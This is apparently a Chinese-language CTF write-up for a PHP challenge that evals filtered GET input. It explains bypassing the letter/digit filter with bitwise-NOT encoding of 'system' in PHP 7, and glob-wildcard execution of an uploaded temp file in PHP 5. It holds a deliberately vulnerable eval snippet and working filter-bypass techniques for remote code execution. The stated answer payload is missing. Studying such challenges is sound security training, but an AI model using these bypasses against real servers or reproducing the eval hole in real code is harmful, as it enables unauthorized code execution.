<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}

限制：

1.webshell长度不超过35

2.正则过滤掉了数字字母还有$和_

php7环境：

取反

php中’~‘表示取反，而取反之后大都是不可见字符

<?php
var_dump(urlencode(~'system'));

取反后的值为%8C%86%8C%8B%9A%92

解码：

<?php
var_dump(urlencode(~'phpinfo'));

答案如下：

php5环境：

通配符

用通配符来进行匹配，无法准确匹配

但我们要继续通配符

[^a]表示这里不为a

[0-9]表示0-9这个范围

而注意到linux中文件基本都是小写，我们上传的文件中后几位是随机的，可能包含大写，所以我们就只需要利用[]表示出大写字母就可以了

在ascii表中，大写字母处于@-[之间，所以很明确了，使用/???/???????[@-[]来进行匹配

执行：

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><form action="web.php" method="post" enctype="multipart/form-data"><input type="file" name="file" id=""><input type="submit" value="submit"></form>
</body>
</html>

写一个form表单上传文件到web.php，使用bp抓包，抓一个上传文件的包和web.php的包

 

把第一个包的post内容放入web.php中

发送请求

结束